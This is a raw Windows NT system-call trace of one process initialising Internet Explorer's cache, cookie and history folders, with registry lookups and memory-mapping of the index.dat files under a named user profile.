 01783   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1239472, ... ) }, 1239472, ... ) == 0x0
 01784   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01785   748   NtSetValueKey  (196,  (196, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 162, ... ) , 0, 1,  (196, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 162, ... ) , 162, ... ) == 0x0
 01786   748   NtClose  (196, ... ) == 0x0
 01787   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1240164, ... ) }, 1240164, ... ) == 0x0
 01788   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1239372, ... ) }, 1239372, ... ) == 0x0
 01789   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 7, 2113568, ... 196, {status=0x0, info=1}, ) }, 7, 2113568, ... 196, {status=0x0, info=1}, ) == 0x0
 01790   748   NtSetInformationFile  (196, 1239344, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01791   748   NtClose  (196, ... ) == 0x0
 01792   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\desktop.ini"}, 1239368, ... ) }, 1239368, ... ) == 0x0
 01793   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 1240164, ... ) }, 1240164, ... ) == 0x0
 01794   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 1239372, ... ) }, 1239372, ... ) == 0x0
 01795   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 7, 2113568, ... 196, {status=0x0, info=1}, ) }, 7, 2113568, ... 196, {status=0x0, info=1}, ) == 0x0
 01796   748   NtSetInformationFile  (196, 1239344, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01797   748   NtClose  (196, ... ) == 0x0
 01798   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini"}, 1239368, ... ) }, 1239368, ... ) == 0x0
 01799   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 01800   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 01801   748   NtQueryValueKey  (192,  (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\260\376\3\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\260\376\3\0"}, 16, ) }, 16, ) == 0x0
 01802   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "Cookies"}, ... 196, ) }, ... 196, ) == 0x0
 01803   748   NtQueryValueKey  (196,  (196, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01804   748   NtOpenKey  (0xf, {24, 184, 0x40, 0, 0,  (0xf, {24, 184, 0x40, 0, 0, "Cookies"}, ... 208, ) }, ... 208, ) == 0x0
 01805   748   NtQueryValueKey  (208,  (208, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (208, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01806   748   NtClose  (208, ... ) == 0x0
 01807   748   NtClose  (196, ... ) == 0x0
 01808   748   NtClose  (192, ... ) == 0x0
 01809   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "Cookies"}, ... 192, ) }, ... 192, ) == 0x0
 01810   748   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 01811   748   NtReleaseSemaphore  (204, 1, ... 0, ) == 0x0
 01812   748   NtWaitForSingleObject  (204, 0, {0, 0}, ... ) == 0x0
 01813   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01814   748   NtQueryValueKey  (196,  (196, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (196, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) }, 56, ) == 0x0
 01815   748   NtClose  (196, ... ) == 0x0
 01816   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies"}, 1239472, ... ) }, 1239472, ... ) == 0x0
 01817   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01818   748   NtSetValueKey  (196,  (196, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 98, ... ) , 0, 1,  (196, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 98, ... ) , 98, ... ) == 0x0
 01819   748   NtClose  (196, ... ) == 0x0
 01820   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies"}, 1240164, ... ) }, 1240164, ... ) == 0x0
 01821   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0
 01822   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0
 01823   748   NtQueryValueKey  (192,  (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 01824   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "History"}, ... 196, ) }, ... 196, ) == 0x0
 01825   748   NtQueryValueKey  (196,  (196, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01826   748   NtOpenKey  (0xf, {24, 184, 0x40, 0, 0,  (0xf, {24, 184, 0x40, 0, 0, "History"}, ... 208, ) }, ... 208, ) == 0x0
 01827   748   NtQueryValueKey  (208,  (208, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (208, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01828   748   NtClose  (208, ... ) == 0x0
 01829   748   NtClose  (196, ... ) == 0x0
 01830   748   NtClose  (192, ... ) == 0x0
 01831   748   NtOpenKey  (0xf, {24, 188, 0x40, 0, 0,  (0xf, {24, 188, 0x40, 0, 0, "History"}, ... 192, ) }, ... 192, ) == 0x0
 01832   748   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 01833   748   NtReleaseSemaphore  (204, 1, ... 0, ) == 0x0
 01834   748   NtWaitForSingleObject  (204, 0, {0, 0}, ... ) == 0x0
 01835   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01836   748   NtQueryValueKey  (196,  (196, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (196, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) }, 86, ) == 0x0
 01837   748   NtClose  (196, ... ) == 0x0
 01838   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1239472, ... ) }, 1239472, ... ) == 0x0
 01839   748   NtCreateKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 196, 2, ) }, 0, 0x0, 0, ... 196, 2, ) == 0x0
 01840   748   NtSetValueKey  (196,  (196, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 128, ... ) , 0, 1,  (196, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 128, ... ) , 128, ... ) == 0x0
 01841   748   NtClose  (196, ... ) == 0x0
 01842   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1240164, ... ) }, 1240164, ... ) == 0x0
 01843   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1239372, ... ) }, 1239372, ... ) == 0x0
 01844   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 7, 2113568, ... 196, {status=0x0, info=1}, ) }, 7, 2113568, ... 196, {status=0x0, info=1}, ) == 0x0
 01845   748   NtSetInformationFile  (196, 1239344, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01846   748   NtClose  (196, ... ) == 0x0
 01847   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\desktop.ini"}, 1239368, ... ) }, 1239368, ... ) == 0x0
 01848   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 1240164, ... ) }, 1240164, ... ) == 0x0
 01849   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 1239372, ... ) }, 1239372, ... ) == 0x0
 01850   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 7, 2113568, ... 196, {status=0x0, info=1}, ) }, 7, 2113568, ... 196, {status=0x0, info=1}, ) == 0x0
 01851   748   NtSetInformationFile  (196, 1239344, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01852   748   NtClose  (196, ... ) == 0x0
 01853   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\desktop.ini"}, 1239368, ... ) }, 1239368, ... ) == 0x0
 01854   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0
 01855   748   NtQueryValueKey  (192,  (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0
 01856   748   NtQueryValueKey  (192,  (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (192, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 01857   748   NtClose  (192, ... ) == 0x0
 01858   748   NtClose  (188, ... ) == 0x0
 01859   748   NtClose  (184, ... ) == 0x0
 01860   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\_!MSFTHISTORY!_"}, ... 184, ) }, ... 184, ) == 0x0
 01861   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!local settings!temporary internet files!content.ie5!"}, ... 188, ) }, ... 188, ) == 0x0
 01862   748   NtWaitForSingleObject  (188, 0, 0x0, ... ) == 0x0
 01863   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 1241472, ... ) }, 1241472, ... ) == 0x0
 01864   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 192, {status=0x0, info=1}, ) }, 7, 2113568, ... 192, {status=0x0, info=1}, ) == 0x0
 01865   748   NtSetInformationFile  (192, 1241448, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01866   748   NtClose  (192, ... ) == 0x0
 01867   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1241388,  (0xc0100080, {24, 0, 0x40, 0, 1241388, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 192, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 192, {status=0x0, info=1}, ) == 0x0
 01868   748   NtSetInformationFile  (192, 1241440, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01869   748   NtQueryInformationFile  (192, 1241440, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01870   748   NtOpenSection  (0x2, {24, 48, 0x0, 0, 0,  (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Local Settings_Temporary Internet Files_Content.IE5_index.dat_802816"}, ... 196, ) }, ... 196, ) == 0x0
 01871   748   NtMapViewOfSection  (196, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x10c0000), {0, 0}, 802816, ) == 0x0
 01872   748   NtReleaseMutant  (188, ... 0x0, ) == 0x0
 01873   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!cookies!"}, ... 208, ) }, ... 208, ) == 0x0
 01874   748   NtWaitForSingleObject  (208, 0, 0x0, ... ) == 0x0
 01875   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies\"}, 1241472, ... ) }, 1241472, ... ) == 0x0
 01876   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies\"}, 7, 2113568, ... 212, {status=0x0, info=1}, ) }, 7, 2113568, ... 212, {status=0x0, info=1}, ) == 0x0
 01877   748   NtSetInformationFile  (212, 1241448, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01878   748   NtClose  (212, ... ) == 0x0
 01879   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1241388,  (0xc0100080, {24, 0, 0x40, 0, 1241388, "\??\C:\Documents and Settings\Martim Carbone\Cookies\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 212, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 212, {status=0x0, info=1}, ) == 0x0
 01880   748   NtSetInformationFile  (212, 1241440, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01881   748   NtQueryInformationFile  (212, 1241440, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01882   748   NtOpenSection  (0x2, {24, 48, 0x0, 0, 0,  (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Cookies_index.dat_32768"}, ... 216, ) }, ... 216, ) == 0x0
 01883   748   NtMapViewOfSection  (216, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x1010000), {0, 0}, 32768, ) == 0x0
 01884   748   NtReleaseMutant  (208, ... 0x0, ) == 0x0
 01885   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!local settings!history!history.ie5!"}, ... 220, ) }, ... 220, ) == 0x0
 01886   748   NtWaitForSingleObject  (220, 0, 0x0, ... ) == 0x0
 01887   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 1241472, ... ) }, 1241472, ... ) == 0x0
 01888   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 7, 2113568, ... 224, {status=0x0, info=1}, ) }, 7, 2113568, ... 224, {status=0x0, info=1}, ) == 0x0
 01889   748   NtSetInformationFile  (224, 1241448, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01890   748   NtClose  (224, ... ) == 0x0
 01891   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1241388,  (0xc0100080, {24, 0, 0x40, 0, 1241388, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 224, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 224, {status=0x0, info=1}, ) == 0x0
 01892   748   NtSetInformationFile  (224, 1241440, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01893   748   NtQueryInformationFile  (224, 1241440, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01894   748   NtOpenSection  (0x2, {24, 48, 0x0, 0, 0,  (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Local Settings_History_History.IE5_index.dat_81920"}, ... 228, ) }, ... 228, ) == 0x0
 01895   748   NtMapViewOfSection  (228, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x1020000), {0, 0}, 81920, ) == 0x0
 01896   748   NtReleaseMutant  (220, ... 0x0, ) == 0x0
 01897   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 1241048, ... ) }, 1241048, ... ) == 0x0
 01898   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 232, {status=0x0, info=1}, ) }, 7, 2113568, ... 232, {status=0x0, info=1}, ) == 0x0
 01899   748   NtSetInformationFile  (232, 1241020, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01900   748   NtClose  (232, ... ) == 0x0
 01901   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini"}, 1241044, ... ) }, 1241044, ... ) == 0x0
 01902   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 1241048, ... ) }, 1241048, ... ) == 0x0
 01903   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 7, 2113568, ... 232, {status=0x0, info=1}, ) }, 7, 2113568, ... 232, {status=0x0, info=1}, ) == 0x0
 01904   748   NtSetInformationFile  (232, 1241020, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01905   748   NtClose  (232, ... ) == 0x0
 01906   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\desktop.ini"}, 1241044, ... ) }, 1241044, ... ) == 0x0
 01907   748   NtWaitForSingleObject  (188, 0, 0x0, ... ) == 0x0
 01908   748   NtReleaseMutant  (188, ... 0x0, ) == 0x0
 01909   748   NtOpenKey  (0xf, {24, 56, 0x40, 0, 0,  (0xf, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 232, ) }, ... 232, ) == 0x0
 01910   748   NtOpenKey  (0xf, {24, 232, 0x40, 0, 0,  (0xf, {24, 232, 0x40, 0, 0, "Extensible Cache"}, ... 236, ) }, ... 236, ) == 0x0
 01911   748   NtClose  (232, ... ) == 0x0
 01912   748   NtWaitForSingleObject  (184, 0, {-600000000, -1}, ... ) == 0x0
 01913   748   NtEnumerateKey  (236, 0, Basic, 288, ... {LastWrite={0x47401762,0x1c74db1}, TitleIdx=0, Name= (236, 0, Basic, 288, ... {LastWrite={0x47401762,0x1c74db1}, TitleIdx=0, Name="feedplat"}, 32, ) }, 32, ) == 0x0
 01914   748   NtOpenKey  (0xf, {24, 236, 0x40, 0, 0,  (0xf, {24, 236, 0x40, 0, 0, "feedplat"}, ... 232, ) }, ... 232, ) == 0x0
 01915   748   NtQueryValueKey  (232,  (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01916   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01917   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) }, 148, ) == 0x0
 01918   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
